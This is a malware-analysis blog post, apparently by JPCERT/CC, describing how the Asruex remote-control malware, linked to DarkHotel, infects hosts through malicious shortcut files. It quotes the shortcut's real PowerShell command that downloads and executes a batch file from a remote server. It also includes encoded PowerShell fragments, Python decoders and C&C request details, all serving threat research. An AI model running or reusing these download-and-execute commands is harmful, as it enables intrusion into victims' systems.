JPCERT/CC has been observing malicious shortcut files that are sent as email attachments to a limited range of organisations since around October 2015. When this shortcut file is opened, the host will be infected with malware called “Asruex”. The malware has a remote controlling function, and attackers sending these emails seem to attempt intruding into the targets’ network using the malware. According to a blog article by Microsoft, the malware is associated with an attacker group identified as “DarkHotel” (Microsoft calls it as "Dubnium") . This blog entry will introduce the details of Asruex.
Infection Mechanism of Asruex
Figure 1 describes the chain of events after a victim opens the malicious shortcut file until the host gets infected with Asruex.
For those cases that JPCERT/CC has observed, when the shortcut file is opened, a downloader is downloaded from a C&C server and then executed. The downloader then downloads Asruex from another C&C server, which is then executed. Detailed behaviour observed in each phase will be explained in the next section.
Details of the Shortcut File
When the malicious shortcut file is opened, the following PowerShell command in the file is executed.
powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile("""http://online-dropbox.com/online/a """, """$env:tmp\gst.bat""")';Invoke-Expression $c&%tmp%\gst.bat "%CD%"
The above PowerShell command downloads a file from the specified URL, and it is saved as a batch file to be executed. The batch file contains the following commands, which execute PowerShell scripts (marked in red).
echo powershell -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUw… chcp 65001 cd "%tmp%" start winword "article_draft.docx" copy "article_draft.docx" "%1" del /f "%1\*.*.lnk" echo powershell -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMA… "%tmp%\dwm.exe"
When the batch file is executed, a Windows executable file (a downloader) and a dummy file for display will be downloaded from a C&C server, saved in %TEMP% folder and then executed. Those decoy documents are written in Japanese, but some are also in Chinese, which implies that the target for this attack is not limited to Japanese organisations.
Details of the Downloader
When the downloader is executed, it downloads a .jpg or .gif image file. Encoded Asruex is contained in the latter part of the image file. The downloader decodes it and then executes the malware.
Asruex contained in the image file is encoded using XOR. The following Python script is used for decoding the encoded data of the image file. The size of the encoded data is specified in the last 4 bytes of the image file.
key = 0x1D # Keys may vary depending on the sample for i in range(0, length): buf[i] = chr(ord(buf[i]) ^ key) key += 0x5D key &=0xff
The downloader may contain an encoded executable file of Process Hacker (a multi-function task manager), and it may execute the Process Hacker if an anti-virus software is detected. Anti-virus software such as by Symantec, McAfee and Kaspersky, etc., are detected based on the process names.
Details of Asruex
Asruex is a kind of malware that communicates with the C&C server over HTTP, and executes the command received through the communication. It has various anti-analysis features such as preventing the malware from running when it detects a virtual machine. Please refer to Appendix A for conditions which Asruex detects a virtual machine. The malware is also capable of detecting anti-virus software.
If Asruex does not detect a virtual machine, it executes one of the following executable files, and injects a DLL file which is contained in Asruex. In case where it detects anti-virus software, Asruex generates a DLL file and loads it to itself (but does not perform DLL injection). This DLL file contains the core functions of Asruex.
The DLL injected, or generated and loaded, sends an HTTP request to a dummy host. If it receives a reply of status code that is 100 or greater, it connects to an actual C&C server as follows:
GET /table/list.php?a1=6fcadf059e54a19c7b96b0758a2d20a4396b85e77138dbaff3fddd04909de91 62a8910eab1141343492e90a78e75bfa7cafa3ed0a51740daa4cad36291e637074255217 –omitted- HTTP/1.1 Connection: Keep-Alive Content-Type: text/plain; charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Host: [host name]
Asruex operates based on the configuration information stored in itself. The configuration Information includes C&C servers and dummy hosts that it connects to, and also version information and a key to decode data which is delivered. For further details on the configuration information, please refer to Appendix B.
The configuration information is encoded. It can be decoded with the following Python code:
(config_size,) = struct.unpack("=I", data[offset:offset+4]) config_offset = offset + 4 encode_config = data[config_offset:config_offset+config_size] i = 0 seed = config_size * 2 // It does not necessarily double while i < config_size: (result, seed) = rand_with_seed(seed) result &= 0xff decode_data.append(chr(ord(encode_config[i]) ^ result)) i += 1 decode_config = "".join(decode_data) (decode_size,) = struct.unpack("=I", decode_config[config_size-4:config_size]) config = lznt1_decompress(decode_config, config_size, decode_size)
Asruex executes commands that are received from a C&C server. Commands that are possibly executed are listed in Table 1. Most of the commands are used for collecting information, but some are for downloading DLL files (AdvProv.dll) from C&C servers and for executing them. AdvProv.dll is a plug-in to expand functions of Asruex.
|1||Collect information of infected hosts|
|2||Obtain process list|
|3||Obtain file list|
|4||Change waiting time|
|5||Obtain version information|
|501||Obtain folder list|
|-||Execute external DLL (AdvProv.dll)|
Details of AdvProv.dll
AdvProv.dll is encrypted using XOR and 3DES. Decryption key is calculated based on the destination URL and the encoding key of the configuration information. Asruex downloads a DLL, loads it into the memory and executes DLL’s export function, Get_CommandProc. AdvProv.dll adds the following commands to Asruex:
|102||Copy a file|
|103||Change a file name|
|104||Change file time|
|105||Delete a file|
|106||Terminate a process|
|107||Search a registry|
|108||Show a registry entry|
|109||Create a registry entry|
|110||Show a registry entry|
|111||Delete a registry entry|
|601||Download and execute a file|
Samples of AdvProv.dll that JPCERT/CC has observed had the listed functions. However, there may be some other versions with different functions.
Asruex is a relatively new kind of malware that has been seen since around October 2015. It is likely that targeted attacks using Asruex will continue.
Hash values of artifacts demonstrated in this article are described in Appendix C. Also, destination URLs confirmed by JPCERT/CC are listed in Appendix D. It is recommended to make sure that the hosts you use are not accessing these URLs.
Thanks for reading.
- Shusei Tomonaga
(Translated by Yukako Uchida)
 Microsoft - Reverse-engineering DUBNIUM
Appendix A: Conditions where Asurex detects an analysis environment
If Asruex detects itself being operated in an environment under any of the following conditions (Table A-1 to A-6), it recognises that it is an analysis environment and stops running.
Table A-1: The user matches the computer name and user name as listed.
Table A-2: Listing up the loaded modules, and if the listed functions are found to be exported.
Table A-3: The listed file names are found.
Table A-4: The listed process names are running.
Table A-5: Listing up the process modules that are running, and the module version matches the combination listed.
Table A-6: The disk name contains the listed strings.
|Computer Name||User Name|
|MS VirtualSCSI Disk Device|
Appendix B: Configuration Information
|0x114||64 * 3||Dummy URLs to connect to × 3|
|0x1D4||256 * 3||HTTP Access URLs × 3|
|0x4D4||256||Sending data store path 1|
|0x5D4||64||Sending data strings 1|
|0x614||256||Sending data store path 2|
|0x714||64||Sending data strings 2|
|0x798||256 * 3||File name × 3|
|0xA98||4||Machine information (pointer)|
|0xA9C||4||Connect destination (pointer)|
|0xAA0||4||Not in use|
Appendix C: SHA-256 Hash Value of Artifacts
Appendix D: Hosts that Asruex connects to